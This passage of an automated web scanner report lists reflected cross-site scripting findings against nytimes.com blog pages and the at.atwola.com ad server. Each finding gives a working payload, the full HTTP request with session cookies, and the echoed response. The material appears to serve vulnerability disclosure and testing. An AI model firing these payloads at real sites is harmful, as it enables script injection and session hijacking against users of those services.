GET /2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/?src=dayp54a37"><script>alert(1)</script>a669c72a928 HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:43:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;anatomy-of-a-scene;books;daniel-radcliffe;david-yates;featured;harry-potter;movies&src=dayp54a37\"><script>alert(1)</script>a669c72a928">
...[SNIP]...

2.170. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d00"><script>alert(1)</script>6ba5c94ec89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframea4d00"><script>alert(1)</script>6ba5c94ec89/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyna4d00"><script>alert(1)</script>6ba5c94ec89/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.171. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5ec"><script>alert(1)</script>c42090ec3fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.09a5ec"><script>alert(1)</script>c42090ec3fb/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.09a5ec"><script>alert(1)</script>c42090ec3fb/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.172. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c91a"><script>alert(1)</script>7a4477580d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.15c91a"><script>alert(1)</script>7a4477580d6/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.15c91a"><script>alert(1)</script>7a4477580d6/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.173. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c338"><script>alert(1)</script>028a4ee8467 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/2217943c338"><script>alert(1)</script>028a4ee8467/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/2217943c338"><script>alert(1)</script>028a4ee8467/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.174. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0ab"><script>alert(1)</script>35dadf78370 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/03a0ab"><script>alert(1)</script>35dadf78370/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/03a0ab"><script>alert(1)</script>35dadf78370/-1/size=300x250;adiframe=y">
...[SNIP]...

2.175. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbbe7"><script>alert(1)</script>962e69fed8b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1cbbe7"><script>alert(1)</script>962e69fed8b/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1cbbe7"><script>alert(1)</script>962e69fed8b/size=300x250;adiframe=y">
...[SNIP]...

2.176. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 311f5"><script>alert(1)</script>dc96217592f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size311f5"><script>alert(1)</script>dc96217592f=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size311f5"><script>alert(1)</script>dc96217592f=300x250;adiframe=y">
...[SNIP]...

2.177. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a40"><script>alert(1)</script>c2bc805a2e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?71a40"><script>alert(1)</script>c2bc805a2e1=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?71a40"><script>alert(1)</script>c2bc805a2e1=1;adiframe=y">
...[SNIP]...

2.178. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb87"><script>alert(1)</script>7aeca9e2ce9 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=1cb87"><script>alert(1)</script>7aeca9e2ce9 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 245

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=1cb87"><script>alert(1)</script>7aeca9e2ce9;adiframe=y">
...[SNIP]...

2.179. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc842"><script>alert(1)</script>c6c404c7f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframebc842"><script>alert(1)</script>c6c404c7f34/3.0/5113.1/221794/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addynbc842"><script>alert(1)</script>c6c404c7f34/3.0/5113.1/221794/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.180. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0ba0"><script>alert(1)</script>2968ba13e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e0ba0"><script>alert(1)</script>2968ba13e9/5113.1/221794/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0e0ba0"><script>alert(1)</script>2968ba13e9/5113.1/221794/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.181. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e09"><script>alert(1)</script>f35ee6743db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.187e09"><script>alert(1)</script>f35ee6743db/221794/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.187e09"><script>alert(1)</script>f35ee6743db/221794/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.182. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9253c"><script>alert(1)</script>2ff6b8beab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/2217949253c"><script>alert(1)</script>2ff6b8beab/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/2217949253c"><script>alert(1)</script>2ff6b8beab/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.183. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ee4"><script>alert(1)</script>5dbd143813e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/021ee4"><script>alert(1)</script>5dbd143813e/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/021ee4"><script>alert(1)</script>5dbd143813e/-1/size=300x360;adiframe=y">
...[SNIP]...

2.184. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf01e"><script>alert(1)</script>606359cf405 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1bf01e"><script>alert(1)</script>606359cf405/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1bf01e"><script>alert(1)</script>606359cf405/size=300x360;adiframe=y">
...[SNIP]...

2.185. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cc9"><script>alert(1)</script>d4da9e8e16c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/sized5cc9"><script>alert(1)</script>d4da9e8e16c=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/sized5cc9"><script>alert(1)</script>d4da9e8e16c=300x360;adiframe=y">
...[SNIP]...

2.186. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7be8"><script>alert(1)</script>81537d575e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x360?d7be8"><script>alert(1)</script>81537d575e4=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x360?d7be8"><script>alert(1)</script>81537d575e4=1;adiframe=y">
...[SNIP]...

2.187. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [noperf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c6d8"><script>alert(1)</script>714077859e3 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x360;noperf=1;alias=93309328;cfp=1;noaddonpl=y;kvpg=gnn%2F;kvmn=93309328;target=_blank;aduho=360;grp=207022603;misc=2070226033c6d8"><script>alert(1)</script>714077859e3 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: at.atwola.com
Proxy-Connection: Keep-Alive
Cookie: Axxd=1; AxData=1#50085; CfP=1; JEB2=4CE45E846E651A454F57E65AF00070C8; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 352

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x360;noperf=1;alias=93309328;cfp=1;noaddonpl=y;kvpg=gnn%2F;kvmn=93309328;target=_blank;aduho=360;grp=207022603;misc=2070226033c6d8"><script>alert(1)</script>714077859e3;adiframe=y">
...[SNIP]...

2.188. http://atwar.blogs.nytimes.com/2010/11/19/recounting-war/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://atwar.blogs.nytimes.com
Path:   /2010/11/19/recounting-war/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe07"><script>alert(1)</script>ef0c8b9436d was submitted in the src parameter. This input was echoed as 2fe07\"><script>alert(1)</script>ef0c8b9436d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/recounting-war/?src=twr2fe07"><script>alert(1)</script>ef0c8b9436d HTTP/1.1
Host: atwar.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:43:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://atwar.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47789

